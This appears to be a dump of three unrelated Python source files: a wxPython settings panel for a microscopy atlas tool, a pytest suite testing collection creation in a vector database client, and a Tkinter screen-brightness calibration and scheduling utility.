self.toolbar.AddSeparator()
self.toolbar.AddTool(leginon.gui.wx.ToolBar.ID_CALCULATE,
'calculate',
shortHelpString='Calculate Atlas')
self.toolbar.AddTool(leginon.gui.wx.ToolBar.ID_PLAY,
'play',
shortHelpString='Publish Atlas')
self.toolbar.EnableTool(leginon.gui.wx.ToolBar.ID_PLAY, False)
self.szmain.AddGrowableCol(0)
self.SetSizer(self.szmain)
self.SetAutoLayout(True)
self.SetupScrolling()
self.Bind(leginon.gui.wx.Events.EVT_ATLAS_CALCULATED, self.onAtlasCalculated)
self.Bind(leginon.gui.wx.Events.EVT_ATLAS_PUBLISHED, self.onAtlasPublished)
def onNodeInitialized(self):
self.toolbar.Bind(wx.EVT_TOOL, self.onSettingsTool,
id=leginon.gui.wx.ToolBar.ID_SETTINGS)
self.toolbar.Bind(wx.EVT_TOOL, self.onCalculateAtlasTool,
id=leginon.gui.wx.ToolBar.ID_CALCULATE)
self.toolbar.Bind(wx.EVT_TOOL, self.onPublishAtlasTool,
id=leginon.gui.wx.ToolBar.ID_PLAY)
def onSettingsTool(self, evt):
dialog = SettingsDialog(self, show_basic=True)
dialog.ShowModal()
dialog.Destroy()
def onAtlasCalculated(self, evt):
self.toolbar.Enable(True)
if self.node.publishargs:
self.toolbar.EnableTool(leginon.gui.wx.ToolBar.ID_PLAY, True)
else:
self.toolbar.EnableTool(leginon.gui.wx.ToolBar.ID_PLAY, False)
def onAtlasPublished(self, evt):
self.toolbar.Enable(True)
def onCalculateAtlasTool(self, evt):
self.toolbar.Enable(False)
threading.Thread(target=self.node.calculateAtlas).start()
def onPublishAtlasTool(self, evt):
self.toolbar.Enable(False)
threading.Thread(target=self.node.publishAtlas).start()
def atlasCalculated(self):
evt = leginon.gui.wx.Events.AtlasCalculatedEvent()
self.GetEventHandler().AddPendingEvent(evt)
def atlasPublished(self):
evt = leginon.gui.wx.Events.AtlasPublishedEvent()
self.GetEventHandler().AddPendingEvent(evt)
class SettingsDialog(leginon.gui.wx.Settings.Dialog):
def initialize(self):
return ScrolledSettings(self,self.scrsize,False,self.show_basic)
class ScrolledSettings(leginon.gui.wx.Settings.ScrolledDialog):
def initialize(self):
leginon.gui.wx.Settings.ScrolledDialog.initialize(self)
sb = wx.StaticBox(self, -1, 'Image Acquisition')
sbsz = wx.StaticBoxSizer(sb, wx.VERTICAL)
if self.show_basic:
sz = self.addBasicSettings()
else:
sz = self.addSettings()
sbsz.Add(sz, 0, wx.ALIGN_CENTER|wx.EXPAND|wx.ALL, 5)
return [sbsz]
def addBasicSettings(self):
sz = wx.GridBagSizer(5, 10)
# preset
presets = self.node.presetsclient.getPresetNames()
self.widgets['preset'] = PresetChoice(self, -1)
self.widgets['preset'].setChoices(presets)
label = wx.StaticText(self, -1, 'Preset:')
sz.Add(label, (0, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['preset'], (0, 1), (1, 1),
wx.ALIGN_CENTER_VERTICAL|wx.EXPAND)
# atlas label
self.widgets['label'] = Entry(self, -1, allowspaces=False)
label = wx.StaticText(self, -1, 'Label:')
sz.Add(label, (1, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['label'], (1, 1), (1, 1),
wx.ALIGN_CENTER_VERTICAL|wx.EXPAND)
# radius
self.widgets['radius'] = FloatEntry(self, -1, min=0.0, chars=6)
label = wx.StaticText(self, -1, 'Radius:')
sz.Add(label, (2, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
#sz.Add(szradius, (2, 1), (1, 1), wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
sz.Add(self.widgets['radius'], (2, 1), (1, 1),
wx.ALIGN_CENTER_VERTICAL|wx.FIXED_MINSIZE|wx.ALIGN_RIGHT)
label = wx.StaticText(self, -1, 'm')
sz.Add(label, (2, 2), (1, 1), wx.ALIGN_CENTER_VERTICAL)
'''
# atlas max size
self.widgets['max size'] = IntEntry(self, -1)
label = wx.StaticText(self, -1, 'Max size:')
sz.Add(label, (3, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['max size'], (3, 1), (1, 1),
wx.ALIGN_CENTER_VERTICAL|wx.EXPAND)
# atlas max size
self.widgets['max targets'] = IntEntry(self, -1)
label = wx.StaticText(self, -1, 'Max targets:')
sz.Add(label, (4, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['max targets'], (4, 1), (1, 1),
wx.ALIGN_CENTER_VERTICAL|wx.EXPAND)
'''
return sz
def addSettings(self):
presets = self.node.presetsclient.getPresetNames()
self.widgets['preset'] = PresetChoice(self, -1)
self.widgets['preset'].setChoices(presets)
self.widgets['label'] = Entry(self, -1, allowspaces=False)
self.widgets['radius'] = FloatEntry(self, -1, min=0.0, chars=6)
self.widgets['max size'] = IntEntry(self, -1, chars=6)
self.widgets['max targets'] = IntEntry(self, -1, chars=6)
self.widgets['overlap'] = FloatEntry(self, -1, max=100.0, chars=6)
self.widgets['mosaic center'] = Choice(self, -1, choices=['stage center', 'current position'])
self.widgets['ignore request'] = wx.CheckBox(self, -1, 'Ignore Request to Make Targets from Others')
#szradius = wx.GridBagSizer(5, 5)
#szradius.Add(self.widgets['radius'], (0, 0), (1, 1),
# wx.ALIGN_CENTER_VERTICAL|wx.FIXED_MINSIZE)
#label = wx.StaticText(self, -1, 'meters')
#szradius.Add(label, (0, 1), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz = wx.GridBagSizer(5, 10)
label = wx.StaticText(self, -1, 'Preset:')
sz.Add(label, (0, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['preset'], (0, 1), (1, 1),
wx.ALIGN_CENTER_VERTICAL|wx.EXPAND)
label = wx.StaticText(self, -1, 'Label:')
sz.Add(label, (1, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['label'], (1, 1), (1, 1),
wx.ALIGN_CENTER_VERTICAL|wx.EXPAND)
label = wx.StaticText(self, -1, 'Radius:')
sz.Add(label, (2, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
#sz.Add(szradius, (2, 1), (1, 1), wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
sz.Add(self.widgets['radius'], (2, 1), (1, 1),
wx.ALIGN_CENTER_VERTICAL|wx.FIXED_MINSIZE|wx.ALIGN_RIGHT)
label = wx.StaticText(self, -1, 'm')
sz.Add(label, (2, 2), (1, 1), wx.ALIGN_CENTER_VERTICAL)
label = wx.StaticText(self, -1, 'Max size:')
sz.Add(label, (3, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['max size'], (3, 1), (1, 1),
wx.ALIGN_CENTER_VERTICAL|wx.EXPAND)
label = wx.StaticText(self, -1, 'Max targets:')
sz.Add(label, (4, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['max targets'], (4, 1), (1, 1),
wx.ALIGN_CENTER_VERTICAL|wx.EXPAND)
label = wx.StaticText(self, -1, 'Overlap:')
sz.Add(label, (5, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['overlap'], (5, 1), (1, 1),
wx.ALIGN_CENTER_VERTICAL|wx.FIXED_MINSIZE|wx.ALIGN_RIGHT)
label = wx.StaticText(self, -1, '%')
sz.Add(label, (5, 2), (1, 1), wx.ALIGN_CENTER_VERTICAL)
label = wx.StaticText(self, -1, 'Mosaic Center:')
sz.Add(label, (6, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['mosaic center'], (6, 1), (1, 1),
wx.ALIGN_CENTER_VERTICAL|wx.FIXED_MINSIZE|wx.ALIGN_RIGHT)
sz.Add(self.widgets['ignore request'], (7, 0), (1, 3), wx.ALIGN_CENTER_VERTICAL)
sz.AddGrowableCol(1)
return sz
if __name__ == '__main__':
class App(wx.App):
def OnInit(self):
frame = wx.Frame(None, -1, 'Mosaic Target Maker Test')
panel = Panel(frame, 'Test')
frame.Fit()
self.SetTopWindow(frame)
frame.Show()
return True
app = App(0)
app.MainLoop()
|
test_create_collection.py
|
import pdb
import copy
import logging
import itertools
import time
import threading
from multiprocessing import Process
import sklearn.preprocessing
import pytest
from utils import *
from constants import *
uid = "create_collection"
class TestCreateCollection:
"""
******************************************************************
The following cases are used to test `create_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_segment_row_limits()
)
def get_segment_row_limit(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_collection_fields(self, connect, get_filter_field, get_vector_field):
'''
target: test create normal collection with different fields
method: create collection with diff fields: metric/field_type/...
expected: no exception raised
'''
filter_field = get_filter_field
logging.getLogger().info(filter_field)
vector_field = get_vector_field
collection_name = gen_unique_str(uid)
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
# "segment_row_limit": default_segment_row_limit
}
logging.getLogger().info(fields)
connect.create_collection(collection_name, fields)
assert connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_segment_row_limit(self, connect, get_segment_row_limit):
'''
target: test create normal collection with different fields
method: create collection with diff segment_row_limit
expected: no exception raised
'''
collection_name = gen_unique_str(uid)
fields = copy.deepcopy(default_fields)
# fields["segment_row_limit"] = get_segment_row_limit
connect.create_collection(collection_name, fields)
assert connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_collection_after_insert(self, connect, collection):
'''
target: test insert vector, then create collection again
method: insert vector and create collection
expected: error raised
'''
# pdb.set_trace()
connect.insert(collection, default_entity)
try:
connect.create_collection(collection, default_fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "Create collection failed: meta table add collection failed,error = collection %s exist" % collection
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_collection_after_insert_flush(self, connect, collection):
'''
target: test insert vector, then create collection again
method: insert vector and create collection
expected: error raised
'''
connect.insert(collection, default_entity)
# connect.flush([collection])
try:
connect.create_collection(collection, default_fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "Create collection failed: meta table add collection failed,error = collection %s exist" % collection
# TODO: assert exception
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_without_connection(self, dis_connect):
'''
target: test create collection, without connection
method: create collection with correct params, with a disconnected instance
expected: error raised
'''
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
dis_connect.create_collection(collection_name, default_fields)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_collection_existed(self, connect):
'''
target: test create collection but the collection name have already existed
method: create collection with the same collection_name
expected: error raised
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
try:
connect.create_collection(collection_name, default_fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "Create collection failed: meta table add collection failed,error = collection %s exist" % collection_name
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_after_drop_collection(self, connect, collection):
'''
target: create with the same collection name after collection dropped
method: delete, then create
expected: create success
'''
connect.drop_collection(collection)
time.sleep(2)
connect.create_collection(collection, default_fields)
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_multithread(self, connect):
'''
target: test create collection with multithread
method: create collection using multithread,
expected: collections are created
'''
threads_num = 8
threads = []
collection_names = []
def create():
collection_name = gen_unique_str(uid)
collection_names.append(collection_name)
connect.create_collection(collection_name, default_fields)
for i in range(threads_num):
t = MyThread(target=create, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
for item in collection_names:
assert item in connect.list_collections()
connect.drop_collection(item)
class TestCreateCollectionInvalid(object):
"""
Test creating collections with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_metric_types()
)
def get_metric_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_segment_row_limit(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_dim(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_string(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_field_types()
)
def get_field_type(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_with_invalid_segment_row_limit(self, connect, get_segment_row_limit):
collection_name = gen_unique_str()
fields = copy.deepcopy(default_fields)
fields["segment_row_limit"] = get_segment_row_limit
with pytest.raises(Exception) as e:
connect.create_collection(collection_name, fields)
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_with_invalid_dimension(self, connect, get_dim):
dimension = get_dim
collection_name = gen_unique_str()
fields = copy.deepcopy(default_fields)
fields["fields"][-1]["params"]["dim"] = dimension
with pytest.raises(Exception) as e:
connect.create_collection(collection_name, fields)
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_with_invalid_collection_name(self, connect, get_invalid_string):
collection_name = get_invalid_string
with pytest.raises(Exception) as e:
connect.create_collection(collection_name, default_fields)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("collection_name", ('', None))
def test_create_collection_with_empty_or_None_collection_name(self, connect, collection_name):
# collection_name = ''
try:
connect.create_collection(collection_name, default_fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "Collection name should not be empty"
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_no_dimension(self, connect):
'''
        target: test create collection with no dimension param in the vector field
        method: create collection with the dim param removed from the vector field
        expected: error raised
'''
collection_name = gen_unique_str(uid)
fields = copy.deepcopy(default_fields)
fields["fields"][-1]["params"].pop("dim")
try:
connect.create_collection(collection_name, fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "dimension is not defined in field type params"
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_no_segment_row_limit(self, connect):
'''
target: test create collection with no segment_row_limit params
method: create collection with correct params
expected: use default default_segment_row_limit
'''
collection_name = gen_unique_str(uid)
fields = copy.deepcopy(default_fields)
fields.pop("segment_row_limit")
connect.create_collection(collection_name, fields)
res = connect.get_collection_info(collection_name)
logging.getLogger().info(res)
assert res["segment_row_limit"] == default_server_segment_row_limit
# TODO: assert exception
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_limit_fields(self, connect):
collection_name = gen_unique_str(uid)
limit_num = 64
fields = copy.deepcopy(default_fields)
for i in range(limit_num):
field_name = gen_unique_str("field_name")
field = {"name": field_name, "type": DataType.INT64}
fields["fields"].append(field)
try:
connect.create_collection(collection_name, fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "maximum field's number should be limited to 64"
# TODO: assert exception
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_invalid_field_name(self, connect, get_invalid_string):
collection_name = gen_unique_str(uid)
fields = copy.deepcopy(default_fields)
field_name = get_invalid_string
field = {"name": field_name, "type": DataType.INT64}
fields["fields"].append(field)
with pytest.raises(Exception) as e:
connect.create_collection(collection_name, fields)
# TODO: assert exception
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_invalid_field_type(self, connect, get_field_type):
collection_name = gen_unique_str(uid)
fields = copy.deepcopy(default_fields)
field_type = get_field_type
field = {"name": "test_field", "type": field_type}
fields["fields"].append(field)
with pytest.raises(Exception) as e:
connect.create_collection(collection_name, fields)
|
screenControl.py
|
import screen_brightness_control as sbc
import time
from tkinter import *
from utility import *
import threading
import json
from tkinter.font import Font
from time import strftime
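# fadeBrightness steps the system brightness from its current value toward fadeTo in a background
# thread, one `increment` per `interval` seconds, and returns the started Thread object
# (or False when the target already equals the current brightness).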
def fadeBrightness(fadeTo, interval = 0.5, increment = 1):
current = sbc.get_brightness()[0]
if fadeTo == current:
return False
    if fadeTo < current:
        increment = -increment
def fadingProcess():
for i in range(current, fadeTo, increment):
sbc.set_brightness(i)
time.sleep(interval)
return True
t1 = threading.Thread(target = fadingProcess)
t1.start()
return t1
def adjustBrightness():
brightness = sum(bounds)/2
sbc.set_brightness(brightness)
brightnessShow["text"] = f"{brightness}%"
if brightnessCheckCompleted():
return endBrightnessCheck()
return brightness
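# The test is finished once the candidate window [bounds[0], bounds[1]] is narrower than 5
# percentage points; the midpoint of that window is then taken as the user's average brightness.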
def brightnessCheckCompleted():
return bounds[1] - bounds[0] < 5
def restart():
bounds[0], bounds[1] = [5, 95]
adjustBrightness()
def endBrightnessCheck():
brightness = round(sum(bounds)/2, 2)
endScreen = Frame(win, bg = "black")
endScreen.place(x = 0, y = 0, width = wu*100, height = hu*100)
title = Label(endScreen, text = "Test Completed", font = ("", calculateFontSize(wu*100, hu*25)), fg = "white", bg = "black")
title.place(x = 0, y = 0, height = hu*25, width = wu*100)
description = f"""
The screen brightness test is now completed.
your average brightness is now set to {brightness}%.
you can retake the test now or go back to the home
screen. Remember you can always take the test and
change your average brightness later.
"""
showDescription = Label(endScreen, text = description, font = ("", int(calculateFontSize(wu*100, hu*55)/2)), justify = "left")
showDescription.place(x = 0, y = hu*25, width = wu*100, height = 55*hu)
# Write the data in a json file
dataToWrite = {"ScreenControl":{
"averageBrightness":str(brightness),
"controllingBrightness":True,
"currentBrightness":str(brightness),
"startTime":"08:00",
"endTime":"22:00"
}}
modifyUserActivity(dataToWrite)
def restartQuiz():
restart()
endScreen.place_forget()
buttonsWidth, buttonsHeight = 30*wu, 10*hu
backButton = assistButton(endScreen, "Go Back", win.quit, buttonsWidth, buttonsHeight)
restartButton = assistButton(endScreen, "Restart The quiz", restartQuiz, buttonsWidth, buttonsHeight)
backButton.place(x = 10*wu, width = buttonsWidth, y = 85*hu, height = buttonsHeight)
restartButton.place(x = 60*wu, width = buttonsWidth, y = 85*hu, height = buttonsHeight)
def about(mainRoot = None, wu = None , hu = None):
aboutScreen = Frame(mainRoot, bg = "black")
aboutScreen.place(x = 0, y = 0, width = wu*100, height = hu*100)
title = Label(aboutScreen, text = "About This Test", font = ("", calculateFontSize(wu*100, hu*25)), fg = "white", bg = "black")
title.place(x = 0, y = 0, height = hu*25, width = wu*100)
description = f"""
Everyone has different screens, different lighting and different eye strain levels etc. So, there is a test which is done
in order to find the most optimal average screen brightness for you. REMEMBER THAT THIS IS ONLY THE
AVERAGE BRIGHTNESS, so the brightness will still be regulated by PAFAT in order to give you the best
experience, like dimming the lights on nights for better sleep etc. However, this test will give PAFAT a baseline of
your favorable brightness. It works by setting the brightness at 50% and then you select if the brightness is too dim
or too bright. Based on that PAFAT changes the brightness until you come up with your optimal brightness. If you
feel that a certain brightness is perfect then you can finalize the brightness or you could keep clicking if the
brightness is too dim or too bright. After a few clicks PAFAT will understand what your optimal brightness is(even if
you haven't finalized it by clicking the finalize button). It does this because getting to extreme precision is not
required. It just wants to know a rough estimate of a brightness that you are comfortable with. Once PAFAT thinks
that it is done then it automatically stops the test and finalizes the result. Remember that you can always take this
test and change your average brightness whenever you want. It also requires your morning and night time in order to know
when to start dimming the lights etc. It sets a default morning and night time however you can change it any time you want.
If you don't want to use this feature then you can turn it off any time.
"""
showDescription = Label(aboutScreen, text = description, font = ("", int(calculateFontSize(wu*90, hu*50)/3)), justify = "left")
showDescription.place(x = 5*wu, y = hu*20, width = wu*90, height = 50*hu)
backButton = assistButton(aboutScreen, "Quit and go back", aboutScreen.place_forget, 70*wu, hu*15)
backButton.place(x = 15*wu, width = 70*wu, y = 75*hu, height = 15*hu)
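# The brightness test is a bisection on the bounds list: the midpoint of [dim, bright] is applied,
# "Too Dim" raises the lower bound just past the midpoint and "Too Bright" lowers the upper bound,
# e.g. [5, 95] -> 50% shown -> "Too Dim" -> [51, 95] -> 73% shown -> "Too Bright" -> [51, 72] -> ...
# until brightnessCheckCompleted() reports the window is under 5 points wide.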
def testScreenBrightness(root, WIDTH, HEIGHT):
def dimFunc():
bounds[0] = sum(bounds)/2 + 1
adjustBrightness()
def brightFunc():
bounds[1] = sum(bounds)/2 - 1
adjustBrightness()
global win, wu, hu, bounds, brightnessShow
wu = WIDTH/100
hu = HEIGHT/100
bounds = [5, 95]
background = "#0080ff"
win = Frame(root, bg = background)
win.place(x = 0, y = 0, width = WIDTH, height = HEIGHT)
title = Label(win, text = "Screen Brightness Test", font = ("", calculateFontSize(wu*100, hu*25)), fg = "white", bg = "black")
title.place(x = 0, y = 0, height = hu*25, width = wu*100)
brightnessShow = Label(win, text = "50%", font = ("", calculateFontSize(WIDTH, hu*6)), bg = background, fg = "black")
brightnessShow.place(x = 0, y = hu*30, width = WIDTH, height = hu*6)
adjustBrightness()
upperButtonsWidth = wu*40 ; upperButtonsHeight = hu*15
lowerButtonsWidth = wu*90 ; lowerButtonsHeight = hu*15
dimButton = standardButton(win, "Too Dim", dimFunc, upperButtonsWidth, upperButtonsHeight)
brightButton = standardButton(win, "Too Bright", brightFunc, upperButtonsWidth, upperButtonsHeight)
completedButton = standardButton(win, "Finalize Brightness", endBrightnessCheck, lowerButtonsWidth, lowerButtonsHeight)
dimButton.place(x = wu*5, y = hu*40, width = upperButtonsWidth, height = upperButtonsHeight)
brightButton.place(x = wu*55, y = hu*40, width = upperButtonsWidth, height = upperButtonsHeight)
completedButton.place(x = wu*5, y = hu*60, width = lowerButtonsWidth, height = lowerButtonsHeight)
backButton = assistButton(win, "Quit and go back", win.quit)
restartButton = assistButton(win, "Restart Test", restart)
aboutButton = assistButton(win, "How does this work?", lambda : about(win, wu, hu))
backButton.place(x = 5*wu, width = 25*wu, y = 85*hu, height = 10*hu)
aboutButton.place(x = 36.5*wu, width = 27*wu, y = 85*hu, height = 10*hu)
restartButton.place(x = 70*wu, width = 25*wu, y = 85*hu, height = 10*hu)
win.mainloop()
def changeData(userDataLabel):
startTime, endTime, brightnessControl = startTimeDropBox.get(), endTimeDropBox.get(), brightnessControlVar.get()
dataToOverWrite = {
"startTime":startTime,
"endTime":endTime,
"controllingBrightness":bool(brightnessControl)
}
userActivity = getUserActivity()
userActivity["ScreenControl"] = userActivity["ScreenControl"] | dataToOverWrite
modifyUserActivity(userActivity)
refreshUserActivity(userDataLabel)
def refreshUserActivity(userDataLabel):
with open("userActivity.json", "r") as f:
userData = dict(json.load(f))["ScreenControl"]
dataToShow = f"""
Average Brightness
{userData["averageBrightness"]}%
Control Brightness
{"on" if userData["controllingBrightness"] else "off"}
Current Brightness
{userData["currentBrightness"]}%
Start Time
{userData["startTime"]}
End Time
{userData["endTime"]}
"""
userDataLabel['text'] = dataToShow
def updateActionInputs():
data = dict(getUserActivity())["ScreenControl"]
startTimeIdx = times.index(data["startTime"])
endTimeIdx = times.index(data["endTime"])
startTimeDropBox.current(startTimeIdx)
endTimeDropBox.current(endTimeIdx)
brightnessControlVar.set(int(data["controllingBrightness"]))
def showAndControlData(root, WIDTH, HEIGHT, wu, hu):
def retakeQuiz():
try:
temp = Frame(root, bg = "white")
temp.place(x = 0, y = 0, width = WIDTH, height = HEIGHT)
testScreenBrightness(temp, WIDTH, HEIGHT)
temp.place_forget()
showAndControlData(root, WIDTH, HEIGHT, wu, hu)
except Exception:pass
global startTimeDropBox, endTimeDropBox, brightnessControlVar, times
root.config(bg = "black")
heading = Label(root, text = "Screen Control", font = ( "", int(calculateFontSize(WIDTH, hu*20) * 1.5)), fg = "black", bg = "#bdbdbd")
heading.place(x = 0, y = 0, width = WIDTH, height = hu*20)
userDataLabel = Label(root, font = ("", calculateFontSize(30*wu, 70*hu)), bg = "#a8ceff", justify = "left")
userDataLabel.place(x = 2*wu, y = 25*hu, height = 70*hu, width = 30*wu)
refreshUserActivity(userDataLabel)
#AF stands for Action Frame
AFWIDTH = 63*wu
AFHEIGHT = 70*hu
afwu = AFWIDTH/100
afhu = AFHEIGHT/100
actionFrameBackground = "#00dea6"
actionFrame = Frame(root, bg = actionFrameBackground)
actionFrame.place(x = 35*wu, y = 25*hu, height = AFHEIGHT, width = AFWIDTH)
times = [f"{i if i >= 10 else f'0{i}'}:{j if j != 0 else '00'}" for i in range(0, 24) for j in range(0, 60, 15)]
dropBoxWidth, dropBoxHeight = afwu * 90, afhu*10
actionHeading = Label(actionFrame, text = "Change Settings", font = ("", calculateFontSize(afwu*100, afhu*10)))
actionHeading.place(x = 0, y = 0, width = 100*afwu, height = 10*afhu)
dropBoxHeading = Label(actionFrame, text = """Change your morning and night time by the dropbox below""", font = ("", int(calculateFontSize(afwu*100, afhu*5)/2)))
dropBoxHeading.place(x = 0, y = 15*afhu, width = 100*afwu, height = 5*afhu)
startTimeDropBox = createDropBox(actionFrame, times, "Blue", "Black", calculateFontSize(dropBoxWidth, dropBoxHeight))
startTimeDropBox.place(x = afwu*5, y = afhu*25, width = dropBoxWidth, height = dropBoxHeight)
endTimeDropBox = createDropBox(actionFrame, times, "Blue", "Black", calculateFontSize(dropBoxWidth, dropBoxHeight))
endTimeDropBox.place(x = afwu*5, y = afhu*40, width = dropBoxWidth, height = dropBoxHeight)
actionHeading = Label(actionFrame, text = "Control Brightness :", font = ("", int(calculateFontSize(afwu*25, afhu*10)*2.3)), bg = actionFrameBackground, fg = "dark blue", justify = "left")
actionHeading.place(x = afwu*5, y = 55*afhu, width = 25*afwu, height = 10*afhu)
brightnessControlVar, brightnessControlCheckBox = createSlidingCheckButton(actionFrame, afwu * 20, afhu*10, 0)
brightnessControlCheckBox.place(y = 55*afhu, x = afwu*31, height = afhu*10)
submitButton = standardButton(actionFrame, "Submit", lambda : changeData(userDataLabel), fontSize = calculateFontSize(afwu*35, afhu*10)*2)
submitButton.place(y = 55*afhu, x = 60*afwu, width = afwu*35, height = afhu * 10)
backButton = RoundedButton(actionFrame, actionFrameBackground, afwu*25, afhu*25, "Go Back", calculateFontSize(afwu*25, afhu*25)*2, root.place_forget)
backButton.place(x = 5*afwu, y = 70*afhu)
backButton = RoundedButton(actionFrame, actionFrameBackground, afwu*30, afhu*25, "Retake The Quiz", calculateFontSize(afwu*25, afhu*25)*2, retakeQuiz)
backButton.place(x = 35*afwu, y = 70*afhu)
aboutButton = RoundedButton(actionFrame, actionFrameBackground, afwu*25, afhu*25, "How it Works", calculateFontSize(afwu*25, afhu*25)*2, lambda : about(root, wu, hu))
aboutButton.place(x = 70*afwu, y = 70*afhu)
font = Font(family = "Helvetica", size = int(calculateFontSize(dropBoxWidth, dropBoxHeight) * 2 / 3))
root.option_add("*TCombobox*Listbox*Font", font)
updateActionInputs()
root.mainloop()
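# calculateCurrentInterval maps the current wall-clock time (in minutes since midnight) onto the ten
# partition boundaries produced by calculatePercentageIntervals and returns the index of the nearest
# boundary, or None when the time falls outside the configured start/end window.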
def calculateCurrentInterval(percentageIntervals):
currentTimeInMinutes = int(strftime("%H")) * 60 + int(strftime("%M"))
if currentTimeInMinutes < percentageIntervals[0] or currentTimeInMinutes > percentageIntervals[-1]:
return None
bounds = []
for i in range(1, 10):
if percentageIntervals[i - 1] <= currentTimeInMinutes <= percentageIntervals[i]:
bounds = [i - 1, i]
calculateBoundDistances = lambda x : abs(percentageIntervals[x] - currentTimeInMinutes)
boundsDistances = [calculateBoundDistances(x) for x in bounds]
return bounds[boundsDistances.index(min(boundsDistances))]
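# setCurrentBrightness builds a band of ten brightness levels centred on the user's average
# (average - 5 .. average + 4) and, via the intervalToBrightness table, picks one level for the
# current interval, records it in userActivity.json, and fades the screen to it.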
def setCurrentBrightness(averageBrightness, interval):
brightnessRange = 5
brightnessRanges = [i for i in range(averageBrightness - brightnessRange, averageBrightness + brightnessRange, 1)]
intervalToBrightness = {
1:10,
2:7,
3:5,
4:5,
5:9,
6:7,
7:4,
8:6,
9:4,
10:2
}
currentBrightnessPercentage = brightnessRanges[intervalToBrightness[interval + 1] - 1]
userActivity = getUserActivity()
userActivity["ScreenControl"]["currentBrightness"] = str(currentBrightnessPercentage)
modifyUserActivity(userActivity)
return fadeBrightness(currentBrightnessPercentage, 1)
def calculatePercentageIntervals(startTime, endTime):
startTimeInMinutes, endTimeInMinutes = [
int(startTime[:startTime.find(":")]) * 60 + int(startTime[startTime.find(":") + 1:]),
int(endTime[:endTime.find(":")]) * 60 + int(endTime[endTime.find(":") + 1:])
]
timeToAlterBrightness = endTimeInMinutes - startTimeInMinutes
percentageIntervals = []
percentageInterval = timeToAlterBrightness // 10
for partition in range(10):
percentageIntervals.append(percentageInterval * partition + startTimeInMinutes)
return percentageIntervals
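# Background control loop: every cycle it re-reads the user's settings, skips adjustment while
# brightness control is switched off, recomputes the ten time partitions between the configured
# start and end times, fades to either the average brightness (outside the window) or the
# interval-specific level, and then waits timeToWait before the next adjustment.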
def mainScreenBrightnessControl():
while True:
try:
data = getUserActivity()["ScreenControl"]
            if not data["controllingBrightness"]:
                time.sleep(10)
                continue
percentageIntervals = calculatePercentageIntervals(data["startTime"], data["endTime"])
timeToWait = (percentageIntervals[1] - percentageIntervals[0]) * 2
currentPercentageInterval = calculateCurrentInterval(percentageIntervals)
            if currentPercentageInterval is None:
                averageBrightness = int(float(data["averageBrightness"]))
                fadeBrightness(averageBrightness, 1)
                time.sleep(timeToWait)
                continue
setCurrentBrightness(int(float(data["averageBrightness"])), currentPercentageInterval)
time.sleep(timeToWait)
# print("h", timeToWait)
except Exception as e:
time.sleep(10)
